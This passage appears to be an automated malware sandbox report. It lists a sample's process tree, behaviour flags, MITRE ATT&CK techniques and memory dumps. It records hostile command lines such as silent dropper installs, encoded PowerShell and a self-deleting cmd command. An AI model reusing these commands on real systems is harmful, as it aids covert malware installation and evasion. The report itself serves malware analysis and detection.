        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
        6⤵
        
        PID:5792
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
        6⤵
        
        PID:2012
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
        6⤵
        
        PID:4220
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
        6⤵
        
        PID:6764
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
        6⤵
        Executes dropped EXE
        
        PID:5300
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
        6⤵
        
        PID:2520
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
        6⤵
        
        PID:1992
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3020 /prefetch:8
        6⤵
        
        PID:5012
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3020 /prefetch:8
        6⤵
        
        PID:6756
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,15045579794183093339,6532059554244505996,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3936 /prefetch:2
        6⤵
        
        PID:7048
  - - C:\Users\Admin\AppData\Local\Temp\ec-ac3fd-9ac-a90a4-11780c7d5b9f8\Nowylizhybae.exe
      "C:\Users\Admin\AppData\Local\Temp\ec-ac3fd-9ac-a90a4-11780c7d5b9f8\Nowylizhybae.exe"
      4⤵
      PID:5828
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xmjadkoo.kwo\GcleanerEU.exe /eufive & exit
        5⤵
        
        PID:3332
      - C:\Users\Admin\AppData\Local\Temp\xmjadkoo.kwo\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\xmjadkoo.kwo\GcleanerEU.exe /eufive
        6⤵
        
        PID:4604
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 256
        7⤵
        Program crash
        
        PID:3116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y44lnemp.n5g\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        
        PID:6868
      - C:\Users\Admin\AppData\Local\Temp\y44lnemp.n5g\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\y44lnemp.n5g\installer.exe /qn CAMPAIGN="654"
        6⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\y44lnemp.n5g\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\y44lnemp.n5g\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632113505 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        7⤵
        
        PID:4720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nusbn4xe.gwt\anyname.exe & exit
        5⤵
        
        PID:3640
      - C:\Users\Admin\AppData\Local\Temp\nusbn4xe.gwt\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\nusbn4xe.gwt\anyname.exe
        6⤵
        
        PID:5816
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sjhkwhgd.muh\gcleaner.exe /mixfive & exit
        5⤵
        
        PID:6120
      - C:\Users\Admin\AppData\Local\Temp\sjhkwhgd.muh\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\sjhkwhgd.muh\gcleaner.exe /mixfive
        6⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 256
        7⤵
        Program crash
        
        PID:6320

C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun198361825f4.exe
Sun198361825f4.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:660

C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun1905815e51282417.exe
Sun1905815e51282417.exe
1⤵
- Executes dropped EXE
PID:4216

C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun193fda712d9f1.exe
Sun193fda712d9f1.exe
1⤵
- Executes dropped EXE
PID:580

C:\Users\Admin\AppData\Local\Temp\7zS8E04AA71\Sun19de8ff4b6aefeb8.exe
Sun19de8ff4b6aefeb8.exe /mixone
1⤵
- Executes dropped EXE
PID:4168
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 260
  2⤵
  - Program crash
  PID:2352

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:5484

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5560
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:5584
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 456
    3⤵
    - Program crash
    PID:6112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5584 -ip 5584
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4168 -ip 4168
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4712 -ip 4712
1⤵
PID:5948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5108 -ip 5108
1⤵
PID:5396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2784 -ip 2784
1⤵
PID:2184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5692 -ip 5692
1⤵
PID:1480

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 784 -ip 784
1⤵
PID:5928

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 5164 -ip 5164
1⤵
PID:1296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1616 -ip 1616
1⤵
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6016 -ip 6016
1⤵
PID:4000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1560 -ip 1560
1⤵
PID:5984

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:1164
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 456
  2⤵
  - Program crash
  PID:2960
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 456
  2⤵
  - Program crash
  PID:3612

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5212 -ip 5212
1⤵
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1576 -ip 1576
1⤵
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2744 -ip 2744
1⤵
PID:3340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1164 -ip 1164
1⤵
PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2804 -ip 2804
1⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\355F.exe
C:\Users\Admin\AppData\Local\Temp\355F.exe
1⤵
PID:4684
- C:\Users\Admin\AppData\Local\Temp\355F.exe
  C:\Users\Admin\AppData\Local\Temp\355F.exe
  2⤵
  PID:5296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1720 -ip 1720
1⤵
PID:6632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4356 -ip 4356
1⤵
PID:6776

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe -Embedding
1⤵
PID:3264

C:\Users\Admin\AppData\Local\Temp\A2FF.exe
C:\Users\Admin\AppData\Local\Temp\A2FF.exe
1⤵
PID:6388
- C:\Users\Admin\AppData\Local\Temp\A2FF.exe
  C:\Users\Admin\AppData\Local\Temp\A2FF.exe
  2⤵
  PID:4816
- C:\Users\Admin\AppData\Local\Temp\A2FF.exe
  C:\Users\Admin\AppData\Local\Temp\A2FF.exe
  2⤵
  PID:5660

C:\Users\Admin\AppData\Local\Temp\2D6D.exe
C:\Users\Admin\AppData\Local\Temp\2D6D.exe
1⤵
PID:6520

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:2936

C:\Users\Admin\AppData\Local\Temp\24CE.exe
C:\Users\Admin\AppData\Local\Temp\24CE.exe
1⤵
PID:6668
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 256
  2⤵
  - Program crash
  PID:2576

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 95b927cb4616ec696e4cd068d5023fc5 jNR+iCmMfU204RS7O8u1lQ.0.1.0.3.0
1⤵
PID:1736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6668 -ip 6668
1⤵
PID:6816

C:\Users\Admin\AppData\Local\Temp\8956.exe
C:\Users\Admin\AppData\Local\Temp\8956.exe
1⤵
PID:5832
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 5832 -s 1684
  2⤵
  - Program crash
  PID:1992

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 716 -p 5832 -ip 5832
1⤵
PID:4552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:6016

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1784

C:\Users\Admin\AppData\Local\Temp\B64E.exe
C:\Users\Admin\AppData\Local\Temp\B64E.exe
1⤵
PID:4676

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 95b927cb4616ec696e4cd068d5023fc5 jNR+iCmMfU204RS7O8u1lQ.0.1.0.3.0
1⤵
PID:2324

C:\Users\Admin\AppData\Local\Temp\DF43.exe
C:\Users\Admin\AppData\Local\Temp\DF43.exe
1⤵
PID:4508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:5208

C:\Users\Admin\AppData\Local\Temp\F59B.exe
C:\Users\Admin\AppData\Local\Temp\F59B.exe
1⤵
PID:4720
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 276
  2⤵
  - Program crash
  PID:5380

C:\Users\Admin\AppData\Local\Temp\17AB.exe
C:\Users\Admin\AppData\Local\Temp\17AB.exe
1⤵
PID:1160
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\17AB.exe"
  2⤵
  PID:6280
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:2472

C:\Users\Admin\AppData\Local\Temp\1E72.exe
C:\Users\Admin\AppData\Local\Temp\1E72.exe
1⤵
PID:3716
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
  2⤵
  PID:4492
- C:\Users\Admin\AppData\Local\Temp\1E72.exe
  C:\Users\Admin\AppData\Local\Temp\1E72.exe
  2⤵
  PID:1224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4720 -ip 4720
1⤵
PID:1472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4604 -ip 4604
1⤵
PID:3304

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:7060

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4948
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding CFE143188E2E44634CF7CA7C3E52A33A C
  2⤵
  PID:3708
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 88264ADE43F18A997784229620645549
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:1708
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8C573F2DD8C7D9B1697FCAE3EFDCBC0A E Global\MSI0000
  2⤵
  PID:3688

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3900
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5556
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 472
    3⤵
    - Program crash
    PID:5436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5556 -ip 5556
1⤵
PID:5136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2952 -ip 2952
1⤵
PID:932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/484-412-0x0000000004CC0000-0x0000000004CC1000-memory.dmp

Filesize
4KB

Download
memory/660-268-0x0000021CE8772000-0x0000021CE8774000-memory.dmp

Filesize
8KB

Download
memory/660-265-0x0000021CEB2B0000-0x0000021CEB32E000-memory.dmp

Filesize
504KB

Download
memory/660-269-0x0000021CE8775000-0x0000021CE8777000-memory.dmp

Filesize
8KB

Download
memory/660-247-0x0000021CE8770000-0x0000021CE8772000-memory.dmp

Filesize
8KB

Download
memory/660-233-0x0000021CCDF30000-0x0000021CCDF31000-memory.dmp

Filesize
4KB

Download
memory/660-250-0x0000021CCFC10000-0x0000021CCFC1B000-memory.dmp

Filesize
44KB

Download
memory/660-271-0x0000021CE8774000-0x0000021CE8775000-memory.dmp

Filesize
4KB

Download
memory/784-361-0x000000001B930000-0x000000001B932000-memory.dmp

Filesize
8KB

Download
memory/1040-246-0x00000000009F0000-0x00000000009F1000-memory.dmp

Filesize
4KB

Download
memory/1040-234-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1040-248-0x000000001AEF0000-0x000000001AEF2000-memory.dmp

Filesize
8KB

Download
memory/1308-552-0x00000000054F0000-0x0000000005B08000-memory.dmp

Filesize
6.1MB

Download
memory/1544-454-0x0000000001870000-0x0000000001880000-memory.dmp

Filesize
64KB

Download
memory/1544-458-0x0000000001890000-0x00000000018A2000-memory.dmp

Filesize
72KB

Download
memory/1616-533-0x0000000000740000-0x000000000076F000-memory.dmp

Filesize
188KB

Download
memory/2040-388-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2164-235-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2168-606-0x0000000000500000-0x0000000000509000-memory.dmp

Filesize
36KB

Download
memory/2176-401-0x00000000021E0000-0x00000000021E1000-memory.dmp

Filesize
4KB

Download
memory/2264-316-0x0000000003950000-0x0000000003A90000-memory.dmp

Filesize
1.2MB

Download
memory/2536-591-0x0000000005D40000-0x0000000005D41000-memory.dmp

Filesize
4KB

Download
memory/2752-538-0x0000000005940000-0x0000000005941000-memory.dmp

Filesize
4KB

Download
memory/2784-341-0x0000000000AE0000-0x0000000000BB4000-memory.dmp

Filesize
848KB

Download
memory/3108-420-0x0000000005910000-0x0000000005911000-memory.dmp

Filesize
4KB

Download
memory/3348-602-0x00000000053A0000-0x00000000053A1000-memory.dmp

Filesize
4KB

Download
memory/3500-418-0x00000000021A0000-0x00000000021A1000-memory.dmp

Filesize
4KB

Download
memory/3552-244-0x0000000002200000-0x0000000002201000-memory.dmp

Filesize
4KB

Download
memory/3664-408-0x0000000002D80000-0x0000000002D82000-memory.dmp

Filesize
8KB

Download
memory/3680-442-0x0000000000820000-0x0000000000823000-memory.dmp

Filesize
12KB

Download
memory/3900-257-0x0000000007920000-0x0000000007921000-memory.dmp

Filesize
4KB

Download
memory/3900-232-0x0000000004790000-0x0000000004791000-memory.dmp

Filesize
4KB

Download
memory/3900-285-0x00000000081E0000-0x00000000081E1000-memory.dmp

Filesize
4KB

Download
memory/3900-405-0x0000000004795000-0x0000000004797000-memory.dmp

Filesize
8KB

Download
memory/3900-227-0x00000000047C0000-0x00000000047C1000-memory.dmp

Filesize
4KB

Download
memory/3900-462-0x000000007F2B0000-0x000000007F2B1000-memory.dmp

Filesize
4KB

Download
memory/3900-256-0x00000000078B0000-0x00000000078B1000-memory.dmp

Filesize
4KB

Download
memory/3900-262-0x0000000007B50000-0x0000000007B51000-memory.dmp

Filesize
4KB

Download
memory/3900-281-0x0000000008010000-0x0000000008011000-memory.dmp

Filesize
4KB

Download
memory/3900-237-0x0000000004792000-0x0000000004793000-memory.dmp

Filesize
4KB

Download
memory/3900-258-0x00000000079C0000-0x00000000079C1000-memory.dmp

Filesize
4KB

Download
memory/3900-238-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

Filesize
4KB

Download
memory/3900-259-0x0000000007AE0000-0x0000000007AE1000-memory.dmp

Filesize
4KB

Download
memory/4108-260-0x00000000053E0000-0x0000000005666000-memory.dmp

Filesize
2.5MB

Download
memory/4108-243-0x0000000004F00000-0x0000000004F01000-memory.dmp

Filesize
4KB

Download
memory/4108-241-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

Filesize
4KB

Download
memory/4108-319-0x00000000065C0000-0x00000000065C1000-memory.dmp

Filesize
4KB

Download
memory/4108-302-0x00000000068F0000-0x00000000068F1000-memory.dmp

Filesize
4KB

Download
memory/4108-252-0x0000000005670000-0x0000000005671000-memory.dmp

Filesize
4KB

Download
memory/4108-309-0x0000000006490000-0x0000000006491000-memory.dmp

Filesize
4KB

Download
memory/4108-226-0x0000000000640000-0x0000000000641000-memory.dmp

Filesize
4KB

Download
memory/4108-320-0x00000000066D0000-0x00000000066D1000-memory.dmp

Filesize
4KB

Download
memory/4108-296-0x0000000005650000-0x000000000566D000-memory.dmp

Filesize
116KB

Download
memory/4108-324-0x00000000064F0000-0x00000000064F1000-memory.dmp

Filesize
4KB

Download
memory/4108-294-0x0000000006280000-0x00000000062A3000-memory.dmp

Filesize
140KB

Download
memory/4112-170-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/4112-171-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/4112-168-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/4112-167-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/4112-172-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/4112-169-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/4112-173-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/4124-261-0x0000000000E80000-0x0000000000E82000-memory.dmp

Filesize
8KB

Download
memory/4168-297-0x0000000000680000-0x00000000006C8000-memory.dmp

Filesize
288KB

Download
memory/4244-517-0x00000000058B0000-0x00000000058B1000-memory.dmp

Filesize
4KB

Download
memory/4256-512-0x0000000005530000-0x0000000005531000-memory.dmp

Filesize
4KB

Download
memory/4264-427-0x0000000004B40000-0x0000000004B41000-memory.dmp

Filesize
4KB

Download
memory/4264-432-0x0000000004B42000-0x0000000004B43000-memory.dmp

Filesize
4KB

Download
memory/4644-146-0x000002E2F2D20000-0x000002E2F2D30000-memory.dmp

Filesize
64KB

Download
memory/4644-147-0x000002E2F2DA0000-0x000002E2F2DB0000-memory.dmp

Filesize
64KB

Download
memory/4644-148-0x000002E2F5470000-0x000002E2F5474000-memory.dmp

Filesize
16KB

Download
memory/4712-303-0x0000000000550000-0x0000000000559000-memory.dmp

Filesize
36KB

Download
memory/4808-439-0x00000000050D0000-0x0000000005356000-memory.dmp

Filesize
2.5MB

Download
memory/4884-229-0x0000000000C80000-0x0000000000C81000-memory.dmp

Filesize
4KB

Download
memory/4884-249-0x000000001B9B0000-0x000000001B9B2000-memory.dmp

Filesize
8KB

Download
memory/4932-547-0x00000000051C0000-0x00000000057D8000-memory.dmp

Filesize
6.1MB

Download
memory/5164-333-0x000000001B190000-0x000000001B192000-memory.dmp

Filesize
8KB

Download
memory/5164-331-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/5176-434-0x0000021005465000-0x0000021005467000-memory.dmp

Filesize
8KB

Download
memory/5176-425-0x0000021005464000-0x0000021005465000-memory.dmp

Filesize
4KB

Download
memory/5176-416-0x0000021005462000-0x0000021005464000-memory.dmp

Filesize
8KB

Download
memory/5176-384-0x0000021005460000-0x0000021005462000-memory.dmp

Filesize
8KB

Download
memory/5204-576-0x0000000005490000-0x0000000005491000-memory.dmp

Filesize
4KB

Download
memory/5212-584-0x0000000004D90000-0x0000000004E22000-memory.dmp

Filesize
584KB

Download
memory/5216-278-0x0000000007D40000-0x0000000007D41000-memory.dmp

Filesize
4KB

Download
memory/5216-336-0x00000000081C0000-0x00000000081C1000-memory.dmp

Filesize
4KB

Download
memory/5216-274-0x0000000000D40000-0x0000000000D41000-memory.dmp

Filesize
4KB

Download
memory/5216-290-0x0000000008620000-0x0000000008621000-memory.dmp

Filesize
4KB

Download
memory/5216-279-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/5216-283-0x0000000007F20000-0x0000000007F21000-memory.dmp

Filesize
4KB

Download
memory/5300-467-0x0000000005C30000-0x0000000005C31000-memory.dmp

Filesize
4KB

Download
memory/5344-275-0x0000000000E00000-0x0000000000E01000-memory.dmp

Filesize
4KB

Download
memory/5628-595-0x00000000032D0000-0x00000000032D1000-memory.dmp

Filesize
4KB

Download
memory/5692-298-0x0000000000E50000-0x0000000000E51000-memory.dmp

Filesize
4KB

Download
memory/5692-306-0x0000000005830000-0x0000000005831000-memory.dmp

Filesize
4KB

Download
memory/5692-329-0x0000000005800000-0x0000000005818000-memory.dmp

Filesize
96KB

Download
memory/5692-321-0x0000000005830000-0x0000000005DD6000-memory.dmp

Filesize
5.6MB

Download
memory/5692-300-0x0000000005DE0000-0x0000000005DE1000-memory.dmp

Filesize
4KB

Download
memory/5748-446-0x0000000005280000-0x0000000005506000-memory.dmp

Filesize
2.5MB

Download
memory/5752-363-0x0000000004DD0000-0x00000000053E8000-memory.dmp

Filesize
6.1MB

Download
memory/5832-481-0x0000000005310000-0x0000000005311000-memory.dmp

Filesize
4KB

Download
memory/5884-390-0x0000000000B60000-0x0000000000B62000-memory.dmp

Filesize
8KB

Download
memory/5884-307-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/5900-407-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/6016-589-0x00000000005E0000-0x0000000000610000-memory.dmp

Filesize
192KB

Download
memory/6024-564-0x00000000053E0000-0x00000000053E1000-memory.dmp

Filesize
4KB

Download
memory/6032-340-0x000000001BDE0000-0x000000001BDE2000-memory.dmp

